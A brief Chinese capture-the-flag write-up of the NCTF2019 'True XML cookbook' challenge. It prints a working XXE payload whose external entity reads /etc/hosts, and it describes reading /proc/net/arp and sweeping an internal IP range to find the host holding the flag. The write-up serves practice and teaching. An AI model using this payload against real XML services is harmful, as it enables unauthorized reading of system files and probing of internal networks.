这题昨天不管我怎么试都报错…可能是buu靶场问题
XXE
XXE除了基本的读文件,还有很多用法,比如探测、攻击内网。能与其他一些漏洞结合起来使用。
读取/etc/hosts
与/proc/net/arp
推得内网存活主机ip
wp
[NCTF2019]True XML cookbook
和Fake XML cookbook差不多,尝试读passwd
flag不在本机,所以XXE攻击内网
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY admin SYSTEM "file:///etc/hosts">
]>
<user><username>&admin;</username><password>123456</password></user>
读取/etc/hosts
与/proc/net/arp
推得内网存活主机ip为10.0.226.2
http直接访问没有东西
爆破内网IP:10.0.226.1-10.0.226.255
访问内网机http://10.0.226.6得到flag
参考链接:http://yulige.top/?p=752#True_XML_cookbook294pt_25solvers